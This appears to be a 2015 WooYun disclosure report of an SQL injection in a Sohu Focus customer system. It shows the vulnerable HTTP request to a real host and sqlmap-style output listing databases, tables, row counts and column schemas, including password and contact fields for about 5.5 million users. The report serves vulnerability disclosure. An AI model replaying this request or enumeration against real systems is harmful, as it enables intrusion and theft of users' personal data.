当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162921

漏洞标题:搜狐焦点某系统sql注入威胁560W用户

相关厂商:搜狐

漏洞作者: Forever80s

提交时间:2015-12-20 16:26

修复时间:2016-02-01 10:51

公开时间:2016-02-01 10:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-20: 细节已通知厂商并且等待厂商处理中
2015-12-21: 厂商已经确认,细节仅向厂商公开
2015-12-31: 细节向核心白帽子及相关领域专家公开
2016-01-10: 细节向普通白帽子公开
2016-01-20: 细节向实习白帽子公开
2016-02-01: 细节向公众公开

简要描述:

rt

详细说明:

客户管理系统 customer.home.focus.cn uac表560W用户

500w.png


GET /proauth/tidiy/20150331/list.php?page=1&type=all&pagesize=8&team=1&ordertype=1&_=1450523184981 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://home.focus.cn/zhuanti15/tidiymatch/
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: customer.home.focus.cn
Cookie: IPLOC=CN88; SUV=1512191837214706; homeforumsaw=607%2C1300; PHPSESSID=n9kkss0gec0vleplh7mnripuk5; _f_bbs_e=0
Accept-Encoding: gzip, deflate
available databases [3]:
[*] home_wd
[*] information_schema
[*] test
[00:29:18] [INFO] fetched data logged to text files under './output/customer.home.focus.cn'
[*] shutting down at 00:29:18
Database: home_wd
[15 tables]
+--------------+
| authtable    |
| authtorole   |
| gzt          |
| gzt_news     |
| member       |
| member2      |
| menutable    |
| project      |
| projectfield |
| raffle       |
| roletable    |
| shake        |
| uac          |
| uac2         |
| userinfo     |
[00:35:17] [DEBUG] performed 11 queries in 0.80 seconds
Database: home_wd
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| uac          | 5522287 |
| uac2         | 466483  |
| raffle       | 307568  |
| member2      | 266379  |
| member       | 139418  |
| projectfield | 2051    |
| project      | 270     |
| authtorole   | 142     |
| authtable    | 99      |
| menutable    | 56      |
| userinfo     | 31      |
| shake        | 12      |
| roletable    | 6       |
| gzt          | 5       |
| gzt_news     | 3       |
+--------------+---------+
+++++++++++++++++++++++++++++++++
Database: home_wd
Table: uac
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(500) |
| city     | varchar(50)  |
| email    | varchar(200) |
| id       | int(4)       |
| ip       | varchar(40)  |
| nickname | varchar(20)  |
| partnum  | int(4)       |
| phone    | varchar(12)  |
| platform | varchar(20)  |
| province | varchar(20)  |
| pwd      | varchar(30)  |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | varchar(20)  |
| votenum  | int(4)       |
+----------+--------------+
Database: home_wd
Table: raffle
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(200) |
| city     | char(50)     |
| email    | char(28)     |
| id       | int(4)       |
| ip       | char(50)     |
| nickname | char(20)     |
| partnum  | int(4)       |
| phone    | char(12)     |
| platform | char(20)     |
| province | char(20)     |
| pwd      | char(30)     |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | char(20)     |
| votenum  | int(4)       |
+----------+--------------+
Database: home_wd
Table: projectfield
[10 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| excelw    | int(4)       |
| field     | varchar(20)  |
| fieldname | varchar(40)  |
| ID        | int(4)       |
| isshow    | smallint(4)  |
| json      | varchar(200) |
| piccatlog | varchar(50)  |
| projectid | int(4)       |
| sortno    | int(4)       |
| width     | int(4)       |
+-----------+--------------+
Database: home_wd
Table: roletable
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| ID       | int(4)      |
| RoleName | varchar(30) |
+----------+-------------+
Database: home_wd
Table: member2
[17 columns]
+----------+-----------+
| Column   | Type      |
+----------+-----------+
| actype   | int(4)    |
| address  | char(140) |
| city     | char(50)  |
| email    | char(28)  |
| id       | int(4)    |
| ip       | char(50)  |
| nickname | char(20)  |
| partnum  | int(4)    |
| phone    | char(12)  |
| platform | char(20)  |
| province | char(20)  |
| pwd      | char(30)  |
| reward   | int(4)    |
| rtime    | datetime  |
| sex      | char(1)   |
| uname    | char(20)  |
| votenum  | int(4)    |
+----------+-----------+
Database: home_wd
Table: menutable
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| level    | int(4)      |
| ID       | int(4)      |
| menuName | varchar(30) |
| menutype | varchar(10) |
| parent   | int(4)      |
| URL      | varchar(60) |
+----------+-------------+
Database: home_wd
Table: project
[6 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| ID        | int(4)      |
| kehuid    | int(4)      |
| proindex  | int(4)      |
| proname   | varchar(40) |
| ptype     | smallint(4) |
| tablename | varchar(10) |
+-----------+-------------+
Database: home_wd
Table: gzt_news
[17 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| actype   | int(4)   |
| address  | text     |
| city     | char(50) |
| email    | char(28) |
| id       | int(4)   |
| ip       | char(50) |
| nickname | char(20) |
| partnum  | int(4)   |
| phone    | char(12) |
| platform | char(20) |
| province | char(20) |
| pwd      | char(30) |
| reward   | int(4)   |
| rtime    | datetime |
| sex      | char(1)  |
| uname    | char(30) |
| votenum  | int(4)   |
+----------+----------+
Database: home_wd
Table: authtorole
[2 columns]
+--------+--------+
| Column | Type   |
+--------+--------+
| AuthID | int(4) |
| RoleID | int(4) |
+--------+--------+
Database: home_wd
Table: member
[15 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| accesstoken | varchar(128) |
| address     | varchar(100) |
| city        | varchar(30)  |
| email       | varchar(30)  |
| headerimg   | varchar(200) |
| ID          | int(4)       |
| loginnum    | int(4)       |
| name        | varchar(30)  |
| nickname    | varchar(30)  |
| phone       | varchar(12)  |
| province    | varchar(30)  |
| pwd         | varchar(30)  |
| rtime       | datetime     |
| sex         | char(1)      |
| uacid       | varchar(40)  |
+-------------+--------------+
Database: home_wd
Table: userinfo
[5 columns]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| AccountEndTime | date        |
| ID             | int(11)     |
| Password       | varchar(20) |
| UserName       | varchar(30) |
| UserRole       | int(4)      |
+----------------+-------------+
Database: home_wd
Table: shake
[4 columns]
+---------+-------------+
| Column  | Type        |
+---------+-------------+
| gmstatu | int(4)      |
| partnum | int(4)      |
| partyid | varchar(20) |
| rtime   | datetime    |
+---------+-------------+
Database: home_wd
Table: gzt
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(500) |
| city     | char(50)     |
| email    | char(28)     |
| id       | int(4)       |
| ip       | char(50)     |
| nickname | char(20)     |
| partnum  | int(4)       |
| phone    | char(12)     |
| platform | char(20)     |
| province | char(20)     |
| pwd      | char(30)     |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | char(20)     |
| votenum  | int(4)       |
+----------+--------------+
Database: home_wd
Table: uac2
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(500) |
| city     | char(50)     |
| email    | char(28)     |
| id       | int(4)       |
| ip       | char(50)     |
| nickname | char(20)     |
| partnum  | int(4)       |
| phone    | char(12)     |
| platform | char(20)     |
| province | char(20)     |
| pwd      | char(30)     |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | char(20)     |
| votenum  | int(4)       |
+----------+--------------+
Database: home_wd
Table: uac
[17 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| actype   | int(4)       |
| address  | varchar(500) |
| city     | varchar(50)  |
| email    | varchar(200) |
| id       | int(4)       |
| ip       | varchar(40)  |
| nickname | varchar(20)  |
| partnum  | int(4)       |
| phone    | varchar(12)  |
| platform | varchar(20)  |
| province | varchar(20)  |
| pwd      | varchar(30)  |
| reward   | int(4)       |
| rtime    | datetime     |
| sex      | char(1)      |
| uname    | varchar(20)  |
| votenum  | int(4)       |
+----------+--------------+
Database: home_wd
Table: authtable
[3 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| Authority | varchar(30) |
| ID        | int(4)      |
| menuID    | int(4)      |
+-----------+-------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-12-21 09:56

厂商回复:

感谢你对搜狐安全的支持!

最新状态:

暂无

漏洞评价:

评价

  1. 2015-12-21 09:37 | 北丐 ( 普通白帽子 | Rank:117 漏洞数:23 | 回收WB,1WB=5RMB,有意出售的表哥请私信)

    回收WB,1WB=5RMB,有意出售的表哥请私信